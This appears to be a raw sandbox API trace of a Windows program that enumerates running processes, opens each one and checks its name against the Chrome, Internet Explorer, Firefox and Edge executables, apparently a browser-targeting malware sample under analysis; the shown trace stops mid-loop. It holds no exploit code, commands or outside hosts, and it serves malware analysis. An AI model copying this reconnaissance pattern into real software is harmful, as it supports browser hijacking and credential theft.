	[0210.719] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0210.720] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x3820
	[0210.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.720] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0210.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.720] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.720] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0210.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.721] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.721] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.722] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x3824
	[0210.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.722] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.722] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.722] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.723] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.723] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.724] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x3828
	[0210.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.724] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.724] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.725] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.725] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.725] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.726] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x382c
	[0210.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.726] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.726] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.727] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.727] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.727] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.728] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x3830
	[0210.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.728] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.728] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.729] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.729] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.729] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.730] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x3834
	[0210.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.730] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.730] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.731] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.731] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.731] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.732] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x3838
	[0210.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.732] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.732] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.732] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.733] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.733] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.734] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x383c
	[0210.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.734] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.734] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.734] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.735] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.735] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0210.736] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x3840
	[0210.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.736] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0210.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.736] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.736] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0210.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.737] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.737] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.738] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x3844
	[0210.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.738] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.738] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.738] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.739] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.739] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0210.739] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x3848
	[0210.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.740] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.740] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.740] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.741] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.741] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0210.742] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x384c
	[0210.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.742] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0210.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.742] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.742] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0210.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.743] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.743] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.744] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x3850
	[0210.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.744] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.744] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.744] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.745] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.745] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0210.746] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x3854
	[0210.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.746] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0210.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.746] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.746] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0210.747] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.747] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.747] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0210.747] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x3858
	[0210.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.748] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0210.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.748] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.748] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0210.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.748] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.749] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0210.749] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x385c
	[0210.749] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.749] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0210.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.750] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.750] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0210.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.750] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.750] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0210.751] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x3860
	[0210.751] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.751] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0210.751] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.751] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.752] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0210.752] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.752] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.752] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0210.753] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0210.753] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0210.754] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x3864
	[0210.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.754] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0210.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.754] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.755] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0210.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.755] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.756] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0210.757] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x3868
	[0210.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.757] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0210.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.758] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.758] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0210.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.758] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.759] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0210.759] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x386c
	[0210.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.759] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0210.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.760] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.760] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0210.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.760] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.761] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0210.761] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x3870
	[0210.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.761] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0210.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.762] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.762] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0210.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.762] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.763] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0210.763] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x3874
	[0210.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.763] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0210.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.764] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.764] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0210.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.765] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.765] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0210.766] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x3878
	[0210.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.766] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0210.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.766] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.767] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0210.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.767] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.767] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0210.768] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x387c
	[0210.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.768] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0210.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.768] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.769] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0210.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.769] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.769] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0210.770] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x3880
	[0210.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.770] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
